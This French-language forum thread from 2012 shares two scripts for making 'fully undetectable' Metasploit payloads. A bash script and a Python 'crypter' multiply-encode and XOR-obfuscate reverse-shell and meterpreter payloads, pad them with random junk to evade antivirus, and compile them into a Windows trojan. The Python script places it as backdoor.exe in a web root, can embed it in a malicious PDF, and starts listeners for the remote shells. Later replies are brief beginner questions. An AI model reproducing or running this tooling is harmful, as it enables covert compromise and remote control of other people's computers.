Index du Forum

communauté marocaine des utilisateurs de backtrack
 
 Index du ForumFAQRechercherS’enregistrerConnexion
:: Script pour créer un payload FUD ::

 
Poster un nouveau sujet   Répondre au sujet     Index du Forum -> Outils, codes et astuces -> Codes et scripts
Sujet précédent :: Sujet suivant  
Auteur Message
Alien
Administrateur

Hors ligne

Inscrit le: 10 Mai 2012
Messages: 173

MessagePosté le: Mer 15 Aoû - 14:04 (2012)    Sujet du message: Script pour créer un payload FUD Répondre en citant

Vérifier les dépendances installée.

Code:
apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32
 mingw32-binutils


Et mettre ce code dans le dossier /pentest/exploits/framework# et chmod +x pour l'exacuter.

Code:
#!/bin/bash
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "  With some Randomic gravy and sauce to bypass Antivirus    " 
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
rm -rf ShellCode
 
echo "Here is a network device list available on yor machine"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
#echo "$IP"
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c 
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2 
echo  ';' >> temp2 
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c 
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c 
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4
 
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx 
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E


source: http://www.secuip.fr/hack/creer-un-payload-fud-avril-2012
Les membres suivants remercient Alien pour ce message :
skyme (15/08/12), Inf3rnus (10/09/12)


Revenir en haut
Publicité






MessagePosté le: Mer 15 Aoû - 14:04 (2012)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Alien
Administrateur

Hors ligne

Inscrit le: 10 Mai 2012
Messages: 173

MessagePosté le: Jeu 6 Sep - 05:51 (2012)    Sujet du message: Script pour créer un payload FUD Répondre en citant

Code:
#!/usr/bin/python
#coding: utf-8
from struct import *
import os
import commands
import subprocess
import random
os.system("clear")
os.chdir("/opt/metasploit/msf3/")
print "**************************************"
print "       __      __   __    ___    __"
print "      / /     / /  /  \\  / _ \\  / /"
print "     / /     / /__/ /\\ \\/ / \\ \\/ / "
print "    / /     / ___  /  \\  /   \\  /  "
print "   / /_____/ /  / /   / /   / /\\ \\ "
print "  /_________/  /_/   /_/   /_/  \\_\\"
print ""
print "**************************************"
print "          Crypter for metasploit        "
print "**************************************"
host = raw_input("lhost (e for external ip) ?").strip()
if host == 'e':
    os.system("curl ifconfig.me >> ip.txt")
    lhost = commands.getoutput('cat ip.txt')
    os.system("rm ip.txt")
    os.system("clear")
    print "[*] lhost: ", lhost
else:
    lhost = host
    print "[*] lhost: ", lhost
lport = raw_input("lport ?").strip()
print "[*] lport: ", lport
print "**************************************"
print "1) windows/shell_reverse_tcp"
print "2) windows/shell/reverse_tcp"
print "3) windows/shell/reverse_tcp_dns"
print "4) windows/shell/reverse_http"
print "5) windows/meterpreter/reverse_tcp"
print "6) windows/meterpreter/reverse_tcp_dns"
print "7) windows/meterpreter/reverse_http"
print "**************************************"
payload = raw_input("Select a payload (1-8):").strip()
payload_raw = "temp.raw"
out = "temp.c"
structure = "structure.c"
key = random.randint(0,255)
print "[*] Generating random junk..."
print "[*] Randomizing file size..."
randomSize = random.randint(20480,25600)

junkA = ""
junkB = ""

junkA += "\""
for i in xrange(1,randomSize):
    junkA += chr(random.randint(65,90))
junkA +=  "\""

junkB += "\""
for i in xrange(0,randomSize):
    junkB += chr(random.randint(65,90))
junkB +=  "\""



print "[*] Generating metasploit shellcode..."
if payload == "1":
    os.system("./msfpayload windows/shell_reverse_tcp LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4" % (lhost,lport,payload_raw))

elif payload == "2":
    os.system("./msfpayload windows/shell/reverse_tcp LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4" % (lhost,lport,payload_raw))

elif payload == "3":
    os.system("./msfpayload windows/shell/reverse_tcp_dns LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4" % (lhost,lport,payload_raw))

elif payload == "4":
    os.system("./msfpayload windows/shell/reverse_http LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4" % (lhost,lport,payload_raw))

elif payload == "5":
    os.system("./msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4" % (lhost,lport,payload_raw))

elif payload == "6":
    os.system("./msfpayload windows/meterpreter/reverse_tcp_dns LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4" % (lhost,lport,payload_raw))

elif payload == "7":
    os.system("./msfpayload windows/meterpreter/reverse_http LHOST=%s LPORT=%s R | ./msfencode -t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -o %s -e x86/countdown -c 4" % (lhost,lport,payload_raw))


a = open(payload_raw,"rb")
b = open(out,"w")

payload_raw = a.read()
tempArray = []
outArray = []
x = 0

print "[*] Encoding with XOR key: ", hex(key)
print "[*] Obfuscating shellcode..."
length = int(len(payload_raw)*2)

for i in xrange(0,length):
    if i % 2 == 0:
        tempArray.append(unpack("B",payload_raw[x])[0]^key)
        x += 1
    else:
        randomByte = random.randint(65,90)
        tempArray.append(randomByte)   
for i in range(0,len(tempArray)):
    tempArray[i]="\\x%x"%tempArray[i]
for i in range(0,len(tempArray),15):
    outArray.append('\n"'+"".join(tempArray[i:i+15])+"\"")
outArray = "".join(outArray)

devide = "i % 2;"
 
open_structure = open(structure).read()
code = open_structure % (junkA,outArray,junkB,key,length,devide)
b.write(code)
b.flush()

print "[*] Compiling trojan horse..."
os.system("i586-mingw32msvc-gcc -mwindows temp.c")
print "[*] Stripping out the debugging symbols..."
os.system("strip --strip-debug a.exe")
print "[*] Moving trojan horse to web root..."
os.system("mv a.exe /var/www/backdoor.exe")
print "**************************************"
print "1) apache server"
print "2) java applet attack"
print "3) create evil PDF"
print "**************************************"
attack = raw_input("Select an attack (1-n):").strip()
if attack == "1":
    print "[*] Starting apache..."
    os.system('sh -c "service apache2 start; sleep 4"')
if attack == "2":
    subprocess.Popen(args=["gnome-terminal", "--command=sh javaAttack.sh"]).pid
if attack == "3":
    original = raw_input("path to original pdf: ").strip()
    print "[*] Creating evil PDF..."
    os.system("./msfcli windows/fileformat/adobe_pdf_embedded_exe EXE::Custom=/var/www/backdoor.exe FILENAME=backdoor.pdf INFILENAME=%s E" % (original))
    os.system("mv /root/.msf4/local/backdoor.pdf /var/www")
    print "[*] moving backdoor.pdf to webroot"
print "[*] lhost: ", lhost
print "[*] lport: ", lport

if payload == "1":
    print "[*] Starting the netcat listener..."
    os.system("nc -lvp %s" % (lport))
elif payload == "2":
    print "[*] Starting the multi handler..."
    os.system("./msfcli multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=%s LPORT=%s E" % (lhost, lport))
elif payload == "3":
    print "[*] Starting the multi handler..."
    os.system("./msfcli multi/handler PAYLOAD=windows/shell/reverse_tcp_dns LHOST=%s LPORT=%s E" % (lhost, lport))
elif payload == "4":
    print "[*] Starting the multi handler..."
    os.system("./msfcli multi/handler PAYLOAD=windows/shell/reverse_http LHOST=%s LPORT=%s E" % (lhost, lport))
elif payload == "5":
    print "[*] Starting the multi handler..."
    os.system("./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s E" % (lhost, lport))
elif payload == "6":
    print "[*] Starting the multi handler..."
    os.system("./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_dns LHOST=%s LPORT=%s E" % (lhost, lport))
elif payload == "7":
    print "[*] Starting the multi handler..."
    os.system("./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_http LHOST=%s LPORT=%s E" % (lhost, lport))

print "[*] Cleaning up..."
os.system("rm temp.c")
os.system("rm temp.raw")
print "[*] Done !"


source http://technicdynamic.com/
Les membres suivants remercient Alien pour ce message :
orion (09/09/12), Inf3rnus (10/09/12)


Revenir en haut
ZeRo-AbSoLu


Hors ligne

Inscrit le: 30 Aoû 2012
Messages: 74
Localisation: Dans le Deep

MessagePosté le: Jeu 13 Sep - 08:14 (2012)    Sujet du message: Script pour créer un payload FUD Répondre en citant

Super merci, c'est quoi un payload exactement ?
_________________
Mess like the bests Die like the rest


Revenir en haut
Skype
Alien
Administrateur

Hors ligne

Inscrit le: 10 Mai 2012
Messages: 173

MessagePosté le: Sam 15 Sep - 08:57 (2012)    Sujet du message: Script pour créer un payload FUD Répondre en citant

ZeRo-AbSoLu a écrit:
Super merci, c'est quoi un payload exactement ?


En informatique, on utilise ce terme au figuré pour désigner la partie du code exécutable d'un virus qui est spécifiquement destinée à nuire (par opposition au code utilisé par le virus pour se répliquer notamment).

http://fr.wikipedia.org/wiki/Charge_utile#Informatique


Revenir en haut
ZeRo-AbSoLu


Hors ligne

Inscrit le: 30 Aoû 2012
Messages: 74
Localisation: Dans le Deep

MessagePosté le: Dim 16 Sep - 10:25 (2012)    Sujet du message: Script pour créer un payload FUD Répondre en citant

Super merci Smile
_________________
Mess like the bests Die like the rest


Revenir en haut
Skype
ZeRo-AbSoLu


Hors ligne

Inscrit le: 30 Aoû 2012
Messages: 74
Localisation: Dans le Deep

MessagePosté le: Mar 18 Sep - 21:07 (2012)    Sujet du message: Script pour créer un payload FUD Répondre en citant

Un payload en exe est donc plus ou moins 'efficace' qu'un virus complet ? Et si oui ou non dans quels cas ?
_________________
Mess like the bests Die like the rest


Revenir en haut
Skype
Alien
Administrateur

Hors ligne

Inscrit le: 10 Mai 2012
Messages: 173

MessagePosté le: Mer 19 Sep - 06:09 (2012)    Sujet du message: Script pour créer un payload FUD Répondre en citant

c'est pas pareil. ça n'a même rien a voir.

Revenir en haut
ZeRo-AbSoLu


Hors ligne

Inscrit le: 30 Aoû 2012
Messages: 74
Localisation: Dans le Deep

MessagePosté le: Mer 19 Sep - 14:05 (2012)    Sujet du message: Script pour créer un payload FUD Répondre en citant

tu peux m'expliquer plus en details ?.
_________________
Mess like the bests Die like the rest


Revenir en haut
Skype
Contenu Sponsorisé






MessagePosté le: Aujourd’hui à 20:13 (2017)    Sujet du message: Script pour créer un payload FUD

Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet     Index du Forum -> Outils, codes et astuces -> Codes et scripts Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 
Sauter vers:  

Index | Panneau d’administration | forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation

© Alien 2012